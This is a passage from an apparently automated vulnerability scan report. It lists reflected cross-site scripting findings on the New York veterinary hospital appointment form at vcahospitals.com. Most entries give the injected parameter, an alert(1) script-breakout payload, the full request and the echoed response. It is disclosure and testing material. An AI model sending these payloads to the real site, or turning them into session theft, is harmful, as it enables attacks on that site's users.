i" id="uri" value="http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=55bce"><script>alert(1)</script>8c1dce1f08e&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5
...[SNIP]...

2.102. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [ipaddress parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/new-york-veterinary-hospital/appt.html

Issue detail

The value of the ipaddress request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa1dd"><script>alert(1)</script>20291fa6c4c was submitted in the ipaddress parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243fa1dd"><script>alert(1)</script>20291fa6c4c&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:17 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=if1brsa07fop60oc6nosjdjeb1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
www.vcahospitals.com/new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243fa1dd"><script>alert(1)</script>20291fa6c4c&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri
...[SNIP]...

2.103. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [lname parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/new-york-veterinary-hospital/appt.html

Issue detail

The value of the lname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f53d0"><script>alert(1)</script>9b9f80a0f40 was submitted in the lname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=f53d0"><script>alert(1)</script>9b9f80a0f40&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:21 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=j4ue3fobud9ifr9lluj5v6krc2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input name="lname" id="lname" type="text" size="30" class="req" maxlength="50" value="f53d0"><script>alert(1)</script>9b9f80a0f40" />
...[SNIP]...

2.104. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/new-york-veterinary-hospital/appt.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22281"><script>alert(1)</script>d33a2c5892d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?22281"><script>alert(1)</script>d33a2c5892d=1 HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:45:56 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html?22281"><script>alert(1)</script>d33a2c5892d=1" />
...[SNIP]...

2.105. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [optin parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/new-york-veterinary-hospital/appt.html

Issue detail

The value of the optin request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e691"><script>alert(1)</script>d26f4a4d140 was submitted in the optin parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=9e691"><script>alert(1)</script>d26f4a4d140&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:26 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=5is2j95h7bmhkpu54r12irmp05; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
ls.com/new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=9e691"><script>alert(1)</script>d26f4a4d140&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fww
...[SNIP]...

2.106. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [other parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/new-york-veterinary-hospital/appt.html

Issue detail

The value of the other request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a872"><script>alert(1)</script>e5865d0001d was submitted in the other parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=7a872"><script>alert(1)</script>e5865d0001d&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:30 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=3iaem1hmp6hv9mq27eu3sdqt14; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input name="other" id="other" type="text" size="40" class="req" maxlength="255" value="7a872"><script>alert(1)</script>e5865d0001d" />
...[SNIP]...

2.107. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [petage parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/new-york-veterinary-hospital/appt.html

Issue detail

The value of the petage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5494"><script>alert(1)</script>954e538de19 was submitted in the petage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=f5494"><script>alert(1)</script>954e538de19&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:34 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=rck5nv710n6smmo8j1o5au3gj1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input name="petage" id="petage" type="text" size="15" maxlength="50" value="f5494"><script>alert(1)</script>954e538de19" />
...[SNIP]...

2.108. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [petname parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/new-york-veterinary-hospital/appt.html

Issue detail

The value of the petname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f62a9"><script>alert(1)</script>48aa8f098b1 was submitted in the petname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:39 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=d24coc2ad0oa7sgdfpbfikjlv2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input name="petname" id="petname" type="text" size="20" maxlength="50" value="f62a9"><script>alert(1)</script>48aa8f098b1" />
...[SNIP]...

2.109. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [pettype parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/new-york-veterinary-hospital/appt.html

Issue detail

The value of the pettype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37f7f"><script>alert(1)</script>e984da2d97e was submitted in the pettype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:44 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=dqg12p4d53qnj55akadef34au0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
al/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=37f7f"><script>alert(1)</script>e984da2d97e&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-vet
...[SNIP]...

2.110. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [phone parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/new-york-veterinary-hospital/appt.html

Issue detail

The value of the phone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d23b"><script>alert(1)</script>c192c8c7378 was submitted in the phone parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:49 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=1ulacnh0hcc7s695g9fao52rn6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input name="phone" id="phone" type="text" size="30" maxlength="20" value="8d23b"><script>alert(1)</script>c192c8c7378" />
...[SNIP]...

2.111. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [reason parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/new-york-veterinary-hospital/appt.html

Issue detail

The value of the reason request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32c7e"><script>alert(1)</script>90a0eb32c87 was submitted in the reason parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:53 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
